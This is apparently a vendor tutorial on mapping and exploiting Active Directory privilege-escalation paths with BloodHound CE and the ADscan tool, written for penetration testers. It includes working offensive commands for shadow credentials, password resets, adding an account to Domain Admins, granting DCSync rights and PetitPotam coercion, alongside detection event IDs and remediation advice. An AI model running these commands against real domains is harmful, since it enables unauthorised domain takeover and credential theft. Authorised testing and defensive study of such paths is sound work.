AD Attack Paths: Map and Exploit with BloodHound (2026)

Manual Active Directory pentesting misses attack paths. You can enumerate users, query LDAP for obvious misconfigurations, and check SPNs — and still walk out of an engagement not realizing the help desk account you compromised on day one had a two-hop path to Domain Admin through an ACL nobody has touched in six years.

BloodHound solves this by modeling Active Directory as a graph. Nodes are objects — users, groups, computers, GPOs, OUs, domains. Edges are relationships — group membership, ACL grants, session data, trust relationships. The shortest path between two nodes is computed automatically. SpecterOps, the team behind BloodHound, reports that over 70% of Active Directory environments contain an exploitable path from any authenticated user to Domain Admin. The path is almost never obvious. It requires traversing relationships that span multiple object types and privilege levels in combinations no manual review process can reliably catch.

MITRE ATT&CK: T1078 — Valid Accounts + T1484 — Domain Policy Modification

This guide covers how BloodHound Community Edition (CE) works, how to collect data, how to read and find active directory attack paths in BloodHound, and how ADscan integrates the same analysis natively — without running a separate collection tool.

How BloodHound Works

BloodHound stores the AD object graph in Neo4j, a graph database. The schema maps directly onto Active Directory:

• Nodes: Users, Groups, Computers, GPOs, OUs, Domains, Containers
• Edges: The relationships that matter for privilege escalation

The edges are where BloodHound's value lives. The key edge types you will encounter on real engagements:

• MemberOf — group membership chains
• GenericAll — full control over the target object
• GenericWrite — write access to non-protected attributes
• WriteDACL — permission to modify the DACL of the target
• WriteOwner — permission to take ownership
• ForceChangePassword — reset the target account's password without knowing the current one
• AddMember — add members to a group
• AllowedToDelegate / AllowedToAct — Kerberos delegation relationships
• HasSession — a privileged user has an active session on a computer
• CanRDP, CanPSRemote — lateral movement edges

The SharpHound or RustHound collector authenticates to the domain and enumerates all of these relationships via LDAP, SMB, and SAMR. The output is a ZIP of JSON files mapping every node and every edge in the environment. Import that ZIP into BloodHound CE and the graph is queryable.

BloodHound CE uses Cypher, Neo4j's query language, to find paths. The pre-built queries handle the common cases — shortest path to Domain Admin, Kerberoastable users with a path to DA, computers where Domain Admins have active sessions. For custom analysis, you write Cypher directly.

Collecting Data

You have three collection options, each with different requirements.

SharpHound (Windows, C#): The original collector. Runs on a Windows machine joined to the domain. Most reliable for session enumeration because it can enumerate SMB sessions from domain-joined hosts. Requires a Windows foothold.

SharpHound.exe -c All --outputdirectory C:\temp\

Collection methods:

• Default — LDAP objects, ACLs, group membership, sessions, local groups
• All — everything including GPO local groups and trust data
• DCOnly — LDAP-only collection from the DC, no host-level enumeration. Faster, less noisy, no session data.

RustHound-CE (Linux, cross-platform): Runs from your Linux attack box. No Windows foothold required. Does not collect session data (that requires SMB access to domain-joined hosts), but covers all LDAP-based relationships — ACLs, group membership, delegation, trusts.

rusthound-ce -u [email protected] -p 'password' -d domain.local -i 192.168.1.1 -o /tmp/bloodhound-output/

The output is a ZIP file. Import it into BloodHound CE via the upload button in the interface.

ADscan: If you are already running ADscan, you do not need a separate collection step. After start_auth, BloodHound-compatible data collection runs natively as part of the enumeration pipeline. The attack graph is built inside ADscan and immediately available for path analysis and ranked findings — no ZIP file, no import step, no Neo4j instance to manage.

[adscan] > start_auth
[adscan] > enumerate

The enumeration output includes attack path analysis computed from the same graph relationships BloodHound uses, ranked by exploitability.

Finding Attack Paths

With data loaded in BloodHound CE, start with the pre-built queries. Open the Analysis panel and run:

Shortest paths to Domain Admins — BloodHound finds the minimum-edge path from any node to the Domain Admins group. This is your primary output. Read every path it returns.

Find all shortest paths from owned principals — Mark your compromised accounts as "Owned" using the right-click context menu. BloodHound then shows paths starting specifically from your current position, filtered to what you can actually reach.

Kerberoastable users with a path to Domain Admin — Combines Kerberoasting enumeration with path analysis. The accounts where cracking the TGS ticket gives you a direct path to DA are your priority targets.

Computers where Domain Admins have sessions — If you can reach any of those computers and escalate locally, you capture DA credentials from memory.

What to look for when reading paths:

Each edge type tells you the technique required at that hop. A path reads like a sequence of operations:

User A  --(MemberOf)-->  Group B  --(GenericAll)-->  User C  --(MemberOf)-->  Domain Admins

Translate that into operations:

1. You are User A. Group B membership is already established — no action needed.
2. Group B has GenericAll over User C. You can reset User C's password, add shadow credentials, or write an SPN and Kerberoast.
3. User C is a member of Domain Admins. Once you control User C, you have DA.

Common edge patterns and what they mean in practice:

• GenericAll or GenericWrite over a user — password reset, shadow credentials, targeted Kerberoasting via SPN write
• WriteDACL over a group or user — modify the DACL to grant yourself GenericAll, then proceed
• AddMember to Domain Admins or privileged group — add yourself or a controlled account directly
• ForceChangePassword — reset the target without needing to know the current password; generates a password change event
• AllowedToAct (RBCD) — resource-based constrained delegation abuse; combine with a machine account you control
• HasSession on a computer you can reach — coerce authentication or dump LSASS if you have local admin

Cypher for custom analysis: if the pre-built queries miss something, write directly. Finding all users with WriteDACL over any member of Domain Admins:

MATCH (u:User)-[:WriteDACL]->(t:User)-[:MemberOf*1..]->(g:Group {name:"DOMAIN [email protected]"})
RETURN u.name, t.name

Executing Attack Paths

Reading a path in BloodHound is the analysis phase. Executing it is a different set of operations, one per edge type.

GenericAll / GenericWrite over a user — shadow credentials:

certipy shadow auto -u '[email protected]' -p 'password' -account 'target_user'

Shadow credentials abuse the msDS-KeyCredentialLink attribute. Requires ADCS in the environment. Generates less noise than a password reset.

GenericAll / GenericWrite over a user — password reset (louder):

bloodyAD --host 192.168.1.1 -d domain.local -u attacker -p password set password target_user 'NewPass123!'

AddMember to a privileged group:

bloodyAD --host 192.168.1.1 -d domain.local -u attacker -p password add groupMember "Domain Admins" attacker

WriteDACL — grant yourself GenericAll first:

bloodyAD --host 192.168.1.1 -d domain.local -u attacker -p password add dcsync attacker

Unconstrained Delegation computer — coerce authentication:

# Trigger with PetitPotam
python3 PetitPotam.py -u attacker -p password <unconstrained-delegation-computer-ip> <dc-ip>
# Capture TGT with Rubeus or krbrelayx

ForceChangePassword:

bloodyAD --host 192.168.1.1 -d domain.local -u attacker -p password set password target_user 'NewPass123!'

Each technique generates different forensic signals. Before executing, know which events will fire: WriteDACL and ACL modifications log to Event ID 5136 (DS Object Modified). Group membership changes log to 4728/4756. Password resets log to 4723/4724. If the engagement has a coordinated detection element or a narrow operational window, sequence your steps accordingly.

With ADscan, attack path execution is integrated into the shell. After enumeration builds the attack graph, the attack_path command shows the ranked paths from your current owned principals. Each step prompts for operator confirmation before executing. You see the full chain before anything runs, evidence is collected automatically at each step, and the workspace tracks what was executed and when.

[adscan] > attack_path

ADscan vs Manual Workflow

The manual workflow is functional but fragmented. You collect with SharpHound or RustHound, import a ZIP into BloodHound CE running on your local machine, analyze the graph, then switch to a different tool for each execution step — bloodyAD for ACL abuse, certipy for shadow credentials, PetitPotam for coercion, impacket for delegation. Evidence collection is manual. The workspace state lives across multiple tool outputs.

With ADscan, the pipeline is one shell:

The PRO feature adscan deliver generates an attack path diagram in the executive report — the full chain visualized, with CVSS scoring, affected accounts, and remediation guidance. Formatted for the client without manual editing.

Running 2+ AD engagements per year? Request PRO beta access — free during beta in exchange for feedback.

Frequently Asked Questions

What is an Active Directory attack path?

An attack path is a sequence of permissions, group memberships, and trust relationships that allows an attacker to move from a low-privileged account to a high-privileged one, such as Domain Admin. These paths often span multiple hops through users, groups, and computers that appear unrelated at first glance.

How does BloodHound find paths to Domain Admin?

BloodHound collects all relationships in Active Directory — group memberships, ACLs, session data, trust links — and stores them in a graph database (Neo4j). It then runs Cypher queries to find the shortest sequence of hops from any starting node to Domain Admin.

What is the difference between BloodHound CE and BloodHound Enterprise?

BloodHound Community Edition (CE) is the free, open-source version maintained by SpecterOps. BloodHound Enterprise is a commercial product that adds continuous monitoring, attack path prioritization, and remediation tracking. For pentesting, CE covers everything you need.

How do I detect attack path abuse in Active Directory?

Monitor Event ID 4728/4729 (group membership changes), 4662 (ACL changes on sensitive objects), and 4769 (Kerberos service ticket requests). Microsoft Defender for Identity and Sentinel both have built-in rules for lateral movement patterns.

Can attack paths be eliminated without restructuring the domain?

Most paths can be broken by removing unnecessary ACL permissions (GenericAll/WriteDACL on privileged accounts), cleaning up stale group memberships, and disabling unconstrained delegation where not needed. A full domain restructure is rarely required.

Conclusion

Active directory attack paths are the output that matters in an internal AD assessment. A list of misconfigurations is less useful than a demonstrated chain from the phished user's account to Domain Admin — with the exact techniques, sequence, and evidence to prove it.

BloodHound is the standard tool for mapping those paths. The graph model surfaces relationships that no manual process can reliably enumerate across a domain of any size. For every internal AD engagement, graph analysis is not optional — it is the methodology.

ADscan integrates the same graph analysis natively, adds ranked path output, operator-confirmed execution, and automatic evidence collection, and closes the loop with client-ready reporting.

• Download ADscan LITE (free, open source): https://github.com/ADScanPro/adscan
• Request PRO beta: https://adscanpro.com/pro